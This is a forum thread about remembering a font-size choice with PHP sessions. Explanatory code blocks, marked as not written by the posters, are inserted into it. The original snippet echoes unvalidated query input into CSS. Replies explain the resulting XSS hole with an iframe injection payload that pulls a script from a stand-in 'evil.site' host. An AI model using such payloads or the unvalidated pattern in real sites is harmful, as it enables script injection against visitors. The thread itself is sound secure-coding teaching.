Accessibility with dynamic font size and page colouring

Discussion in 'Web Design and Development' started by carlosbutler, May 9, 2010.

  1. carlosbutler macrumors 6502a

    carlosbutler

    Joined:
    Feb 24, 2008
    Location:
    London City
    #1
    I am trying to make a website more accessible to as many users as possible, for example people with bad eyesight. I am trying to include in my PHP scripts something that will remember certain properties like font size. Although when I load a new page it reverts back to the default size. I tried doing it with session variables, but can't quite get it to work. Pseudo code:

    isset session variable font size
    session variable font size = number

    css style font = number

    that's it. Obviously when you load a new page, the session variable should still be there, but it isn't. Don't really understand why. Any better ideas?
     
  2. angelwatt Moderator emeritus

    angelwatt

    Joined:
    Aug 16, 2005
    Location:
    USA
    #2
    Seeing the actual code may help for any typos and the like. I've used cookies in the past for this type of setup.
     
  3. Cabbit macrumors 68020

    Cabbit

    Joined:
    Jan 30, 2006
    Location:
    Scotland
    #3
    Do you have Session Start at the top of every php file?
     
  4. carlosbutler thread starter macrumors 6502a

    carlosbutler

    Joined:
    Feb 24, 2008
    Location:
    London City
    #4
    Well after trying again I managed to get it done:
    PHP:
    session_start();
    if(!isset($_GET['fontGET']) && !isset($_SESSION['font'])){
        $_SESSION['font'] = 14;
    }
    if(isset($_GET['fontGET'])){
        $_SESSION['font'] = $_GET['fontGET'];
    }
    $fontSmaller = $_SESSION['font']-2;
    $fontBigger = $_SESSION['font']+2;
    ...
    HTML:
    #mainBody {
    	font-size:<?php echo $_SESSION['font']; ?>px;
    }

    T- and T+ are links to ?fontGET=xx. Although if you have any better ways let me know.
     
  5. angelwatt Moderator emeritus

    angelwatt

    Joined:
    Aug 16, 2005
    Location:
    USA
    #5
    Just want to point out a big security vulnerability in your code. If someone were to send the value,
    HTML:
    </style><body><iframe src="evil.site/evil.script"></iframe>
    in the fontGET argument (which is very easy to do) someone could essentially take over the site and deliver viruses/spyware/etc to your visitors, compromise user data, and other nasty things.

    Doing a basic check that the value is an integer (is_int()) will protect you from this attack.
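    A hardened version of the post #4 handler, added here as an illustration and not code from either poster. One detail worth knowing: every value in $_GET arrives as a string, so is_int($_GET['fontGET']) is never true; this version validates with filter_var() and FILTER_VALIDATE_INT instead, clamps the size to an assumed range of 10 to 24 px (the bounds and step are my choice, not from the thread), and ignores anything that fails, so the only thing that can ever be interpolated into the stylesheet is a small integer.

```php
<?php
// Added example (not the thread author's code): a hardened version of the
// font-size handler from post #4. Values in $_GET are always strings, so
// is_int($_GET['fontGET']) would never be true; instead the value is
// validated with filter_var() as an integer within an allowed range, and
// anything else is discarded so the session keeps its previous value.

declare(strict_types=1);

const FONT_DEFAULT = 14;
const FONT_MIN     = 10;   // assumed sensible bounds, not from the thread
const FONT_MAX     = 24;
const FONT_STEP    = 2;

/**
 * Return the requested font size only if it is a whole number inside
 * [FONT_MIN, FONT_MAX]; otherwise return null so the caller keeps the
 * previous (or default) value.
 */
function validateFontSize(mixed $raw): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null;           // arrays such as ?fontGET[]=1 are rejected outright
    }
    $size = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => FONT_MIN, 'max_range' => FONT_MAX],
    ]);
    return $size === false ? null : $size;
}

session_start();

// Initialise once; later requests keep whatever the session already holds.
if (!isset($_SESSION['font'])) {
    $_SESSION['font'] = FONT_DEFAULT;
}

// Only a validated integer ever reaches the session (and therefore the page).
if (isset($_GET['fontGET'])) {
    $requested = validateFontSize($_GET['fontGET']);
    if ($requested !== null) {
        $_SESSION['font'] = $requested;
    }
}

$font        = (int) $_SESSION['font'];
$fontSmaller = max(FONT_MIN, $font - FONT_STEP);
$fontBigger  = min(FONT_MAX, $font + FONT_STEP);
?>
<style>
/* The (int) cast above guarantees this interpolation is digits only. */
#mainBody { font-size: <?php echo $font; ?>px; }
</style>
<a href="?fontGET=<?php echo $fontSmaller; ?>">T-</a>
<a href="?fontGET=<?php echo $fontBigger; ?>">T+</a>
```

    The important design point is that the session value is written only from the validated integer and read back through an (int) cast, so the CSS block never sees raw request input even if some other code path stores a string in $_SESSION['font'].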
     
  6. carlosbutler thread starter macrumors 6502a

    carlosbutler

    Joined:
    Feb 24, 2008
    Location:
    London City
    #6
    Okay, thanks. Although would that not only be on their machine? I thought session variables were kept locally?

    Even if someone typed in www.example.com/?fontGET=<body><iframe src="evil.site/evil.script"></iframe>? or am I overseeing something?

    Also, would that even be valid HTML:
    HTML:
    #mainBody {
    	font-size:<iframe src="evil.site/evil.script"></iframe>px;
    }
    
     
  7. 7on macrumors 601

    7on

    Joined:
    Nov 9, 2003
    Location:
    Dress Rosa
    #7
    No but he wrote a </style> in there so it'd be

    HTML:
    #mainBody {
    	font-size:
    </style>
    <body>
    <iframe src="evil.site/evil.script"></iframe>px;
    }
    
     
  8. carlosbutler thread starter macrumors 6502a

    carlosbutler

    Joined:
    Feb 24, 2008
    Location:
    London City
    #8

    Ah yes, I never realised. Although I meant having the two open body tags.
     
  9. angelwatt Moderator emeritus

    angelwatt

    Joined:
    Aug 16, 2005
    Location:
    USA
    #9
    For this limited example, yes, it would only affect the person entering that in. The example could be taken further though and cause a more permanent change to your site by writing files to your web host or overwriting existing files on the web host. Or it could be taken advantage of by using CSRF (other reading for CSRF) or XSS techniques. I didn't want to give too malicious of an example, but I've read a few PHP security books that do include some nasty code that could compromise your current code. Never trust data coming from users, especially since there's such an easy fix.
     
  10. carlosbutler thread starter macrumors 6502a

    carlosbutler

    Joined:
    Feb 24, 2008
    Location:
    London City
    #10
    Crikey, never even thought of doing something like that. Surely that then means you could include a PHP script from some other server?

    Out of interest, if you did want to pass a string of letters, such as this forum does, how would you go about that?
     
  11. splitpea macrumors 6502a

    Joined:
    Oct 21, 2009
    Location:
    Among the starlings
    #11
    They can only change your files if you are actually executing based on user-input code, or taking advantage of vulnerabilities in the language itself.

    For strings, depending on the use, either check them against a list of known-good strings (a MUST if you're, for instance, passing the name of an include file -- one of those cases in which they can rewrite your files if the server isn't configured perfectly... and which shouldn't be done anyway: there are better ways to accomplish that) or if you're outputting the string to the browser, run it through an HTML-escaping routine (or the equivalent if you're using it to write Javascript, CSS, etc).
     
  12. angelwatt Moderator emeritus

    angelwatt

    Joined:
    Aug 16, 2005
    Location:
    USA
    #12
    For a forum-like environment, HTML that's entered in is displayed as typed (in HTML-entity form), so it doesn't show up as actual HTML tags in the post. Some web apps will only allow specific HTML tags to be used by visitors using a function like strip_tags().

    Here is a PHP security guide primer that has some decent information about understanding the security issue. It only talks about things at a basic level, but makes for a good starting point and covers the basics every PHP developer should know.
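    The two string-handling patterns splitpea (#11) and angelwatt (#12) describe, as an added example that is not code from any poster: a request parameter that chooses an include file is looked up in a fixed allowlist rather than used as a path, and free text echoed back to the browser is run through htmlspecialchars() so that tags are displayed literally the way this forum displays them. The page names, file paths and sample post body are made up for the illustration.

```php
<?php
// Added example (not from the thread): the two string-handling patterns
// from posts #11 and #12. (1) A user-supplied name that selects an include
// file is checked against a fixed allowlist, never used as a path.
// (2) A free-text string that is echoed back is HTML-escaped so that tags
// are displayed literally, as a forum does. Names and paths are made up.

declare(strict_types=1);

// (1) Allowlist: map a request parameter to a file chosen in advance.
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

/** Resolve a page name to an include path, or null if it is not allowed. */
function resolvePage(string $name): ?string
{
    // Array lookup, not string concatenation: "../../etc/passwd",
    // "http://evil.example/x" or "<script>" all simply miss the map.
    return PAGES[$name] ?? null;
}

// (2) Output escaping for HTML body and attribute contexts.
function escapeHtml(string $text): string
{
    // ENT_QUOTES escapes both quote styles, so the result is also safe inside
    // attribute values; ENT_SUBSTITUTE replaces invalid UTF-8 instead of
    // returning an empty string; the charset is stated explicitly.
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// --- demonstration with constructed input ---
$requestedPage = $_GET['page'] ?? 'home';
$path = resolvePage((string) $requestedPage);
if ($path === null) {
    http_response_code(404);
    $path = PAGES['home'];   // fall back to a known page; never echo the bad input
}
// include $path;   // only ever one of the three allowlisted files

// A post body as a forum visitor might type it (constructed sample).
$post = '<b>hi</b> <script>alert(1)</script> "quoted" & more';
echo '<div class="post">' . escapeHtml($post) . '</div>';
```

    Escaping on output is the safer default for forum-style text: strip_tags() with a list of permitted tags still leaves any attributes on those tags untouched, so it does not by itself stop script in an attribute value, whereas escaping every post body and rendering the result displays exactly what the visitor typed.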
     
  13. Cabbit macrumors 68020

    Cabbit

    Joined:
    Jan 30, 2006
    Location:
    Scotland
    #13
    Oh, just a little hint to help your accessibility drive.
    Put
    HTML:
    <a class="contentSkip" href="#content">Skip to content</a>
    right at the top of your page before any content and navigation. The class is so you can style it out of the page completely by making it invisible or something. I use opacity 0.1;.

    And at your content put the anchor for it. Something I have noticed that really helps: if you put "Content Updated: 1 hours ago" or something to that effect before this skip link, it saves a lot of time if I am looking for new posts to read.
     
